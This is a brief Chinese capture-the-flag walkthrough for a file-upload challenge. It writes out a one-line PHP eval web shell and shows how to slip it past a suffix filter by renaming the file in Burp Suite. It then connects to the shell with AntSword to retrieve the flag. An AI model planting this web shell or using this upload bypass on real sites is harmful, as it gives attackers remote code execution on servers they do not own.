题目:
解题:
步骤1:上传文件
上传一句话木马,编辑文件a.php,内容为:<?php eval($_POST['shell']);?>
直接上传的话,会提示错误。题目要求选择图片格式上传,文件名改为a.jpg,内容为:<?php eval($_POST['shell']);?>,然后通过burp suite来修改上传文件名字。
步骤2:改文件名
把a.jpg改为a.php,然后点send,会发现上传成功:
<img src="../upload/a.php" width="250px" />
步骤3:蚁剑连接
url地址:http://47cc3cc5-4e7f-46a4-bf51-9c3b2ed31e5f.node4.buuoj.cn:81/upload/a.php
连接密码:shell
连接进去后,在C盘打开下面这个文件就可以得到flag。
步骤4:查看源码
根据源码可知,该题过滤了文件后缀名,只允许上传后缀为jpg/png/gif的文件。